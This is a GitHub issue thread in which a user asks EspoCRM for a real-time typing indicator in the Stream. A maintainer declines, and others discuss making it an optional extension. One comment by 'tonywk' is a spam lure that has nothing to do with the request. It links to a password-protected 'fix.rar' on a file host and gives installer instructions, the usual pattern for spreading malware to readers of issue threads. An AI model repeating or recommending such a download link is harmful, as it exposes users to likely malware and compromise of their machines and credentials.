### ISSUE TITLE
Websocket: user is typing for Stream

### ISSUE THREAD

**Issue by Kharg** [espocrm/espocrm#3129]
**Is your feature request related to a problem? Please describe.**
When a user types a message in the stream and WebSocket is enabled, the stream updates instantly. It would be useful to also display a real-time typing indicator when a user is typing, provided WebSocket is enabled.

**Describe the solution you'd like**
Animated visual indicator showing that the user is typing, username should be in bold and maybe it could also link to the user profile.
![typing3](https://github.com/user-attachments/assets/ec7b587d-f506-48c5-ac1d-2249a7ce0f28)

**Additional context**
It should work just like Messaging apps:
![1_u07dj-ZIlM1cu6CM1QiSwg](https://github.com/user-attachments/assets/1d02e074-997e-4fdf-b1bf-a6d342347fc6)

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by yurikuzn** [comment]
Unlikely to be added.

**Comment by Kharg** [comment]
@bandtank Thanks for the feedback.

It would be useful to see when someone is about to post in the stream, so you can wait for their update and check it immediately. Similarly, if you're writing an update, you can wait for the other person to finish before posting.

If many users dislike this feature, there could be an option in user preferences to disable typing notifications. However, I believe this feature has no downsides.

**Comment by bandtank** [comment]
@Kharg The extension will set the feature to be disabled by default. Each user or an admin will be able to enable it on an individual basis.
